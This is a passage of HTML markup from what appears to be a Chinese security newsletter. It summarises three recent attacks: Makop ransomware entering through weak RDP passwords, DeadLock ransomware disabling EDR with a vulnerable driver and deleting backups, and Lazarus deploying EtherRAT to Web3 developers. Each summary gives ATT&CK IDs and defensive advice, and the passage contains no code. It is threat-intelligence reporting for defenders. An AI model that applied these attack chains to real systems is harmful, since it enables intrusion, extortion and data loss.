0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j8nv91q33"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 10 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用RDP暴露和弱口令为入口渗透受害网络并提权维持持续入侵</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="font-size: 14px;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">操作系统凭证转储（T1003）、远程服务（T1021）、网络服务发现（T1046）、权限提升漏洞利用（T1068）、入口工具传输（T1105）、暴力破解（T1110）、外部远程服务（T1133）、禁用或修改工具（T1562.001）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j8nug10ts" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/makop-ransomware-guloader-and-privilege-escalation-in-attacks-against-indian-businesses/" target="_blank">https://www.hendryadrian.com/makop-ransomware-guloader-and-privilege-escalation-in-attacks-against-indian-businesses/</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 []">Makop 勒索软件通过暴露的 RDP 服务及弱口令获取初始访问权限，借助暴力破解或字典攻击渗透受害网络。攻击者利用 NetScan 等网络扫描工具探查内部环境，利用 CVE-2017-0213 等已知本地权限提升漏洞实现深度渗透，还部署定制化安全产品卸载工具、滥用存在漏洞的签名驱动程序绕过防护，最新策略通过 GuLoader 加载器分发第二阶段恶意载荷，增强攻击隐蔽性。获得足够权限后，攻击者部署加密模块加密目标数据实施勒索。此次攻击导致受影响系统数据加密、业务中断、数据丢失及潜在财务损失，严重干扰企业运营。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8j8nug1wkv" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigdjvi20or" style="font-size: 14px;" data-mpa-action-id="mdigdjvs190d" data-pm-slice="0 0 []">加强 RDP 服务安全防护，关闭不必要公开端口、启用复杂密码与多因素认证；及时更新系统补丁修补漏洞，部署多层次安全检测防御措施，做好数据备份与应急响应预案，降低业务风险。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigfqighko"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8ma0u31cup" style="font-size: 32px;" data-mpa-action-id="md8ma0v2rky" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid="" data-mpa-action-id="mfag8t7o1pcm" data-pm-slice="0 0 []"><span mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">通过BYOVD技术禁用EDR防护并利用杀毒软件漏洞终止关键服务加密数据</span></span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">远程系统发现（T1018）、远程桌面协议（T1021.001）、系统所有者 / 用户发现（T1033）、网络服务发现（T1046）、域组（T1069.002）、有效账户（T1078）、Web 服务（T1102）、修改注册表（T1112）、防御规避型漏洞利用（T1211）、系统二进制代理执行（T1218）、MMC（T1218.014）、远程桌面软件（T1219.002）、抑制系统恢复（T1490）、绕过用户账户控制（T1548.002）、禁用或修改工具（T1562.001）、禁用或修改系统防火墙（T1562.004）、服务执行（T1569.002）</span></span></p></li><li><p><span mpa-font-style="md8jbwp71xl3" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://blog.talosintelligence.com/byovd-loader-deadlock-ransomware/" target="_blank">https://blog.talosintelligence.com/byovd-loader-deadlock-ransomware/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdigfqi21vxd" style="font-size: 14px;">攻击者利用杀毒软件驱动漏洞（CVE-2024-51324），通过 BYOVD 技术及未知加载器（EDRGay.exe）对 Windows 系统发起攻击。攻击前借助合法账号渗透，修改注册表开启远程桌面服务，为后续入侵铺垫；通过伪装驱动程序建立用户态与内核态通信，终止安全软件进程，再以 PowerShell 脚本绕过 UAC 提升权限，禁用 Windows Defender、备份及数据库服务，删除影子复制数据阻断恢复。攻击者还修改系统配置、安装 AnyDesk 实现持久远程访问，最终通过 DeadLock 勒索软件的定制流密码加密算法，对文件进行多线程高效加密并发布勒索提示。此次攻击导致系统核心安全服务失效、业务中断，数据恢复与取证难度增加。</span></p><p style="margin-top: 16px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">防护建议：</span></span></span></p><p style="margin-top: 0px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="">尽快修补相关漏洞，更新系统及安全软件，强化权限与账户管理，部署入侵检测系统，采用分层备份防护，限制远程访问工具安装，实施关键组件白名单管理。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdighks2kof"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9n1h17ag" style="font-size: 32px;" data-mpa-action-id="md8m9n2ku94" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用漏洞部署新型EtherRAT恶意软件，并借助Ethereum智能合约确保持续远程访问和控制</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jdygzf90"><span leaf="">攻击方式关键词：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: justify;"><span leaf="">社交工程（T1598）、漏洞利用（T1190）、用户执行（T1204）、恶意软件部署（T1204.002）、远程控制（T1219）、命令与控制（T1071）、供应链攻击（T1195）、持久化（T1098）、数据窃取（T1081）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jdygzm0s" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/north-korea-linked-actors-exploit-react2shell-to-deploy-new-etherrat-malware/" target="_blank">https://www.hendryadrian.com/north-korea-linked-actors-exploit-react2shell-to-deploy-new-etherrat-malware/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jdygzmy1" style="font-size: 14px;">近期，Lazarus针对 Web3 开发者发起攻击，利用未修补的 React Server Components 漏洞（CVE-2025-55182），结合社交工程学手法发布虚假招聘信息和编码任务，诱骗目标安装含后门的恶意软件。攻击者通过 EtherRAT 恶意软件实现远程访问控制，借助以太坊智能合约进行隐蔽 C2 通信，还利用 npm 生态、Vercel 托管服务及 Visual Studio Code 仓库传播恶意代码，并设置多重持久化机制长期控制目标系统。此次攻击可能导致敏感信息泄露、开发环境及源代码安全受胁，给相关企业带来技术风险与信誉损失，对 Web3 开发领域产生长远负面影响。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jdygz14il" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span style="font-size: 14px;" mpa-font-style="mdighkrrvpq"><span leaf="">及时修补相关漏洞、更新 npm 依赖，强化社交工程攻击防范，部署多因素认证、入侵检测系统及安全审计，优化源代码管理平台与开发工具安全配置，提升员工安全意识，建立供应链攻击威胁检测与响应机制。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 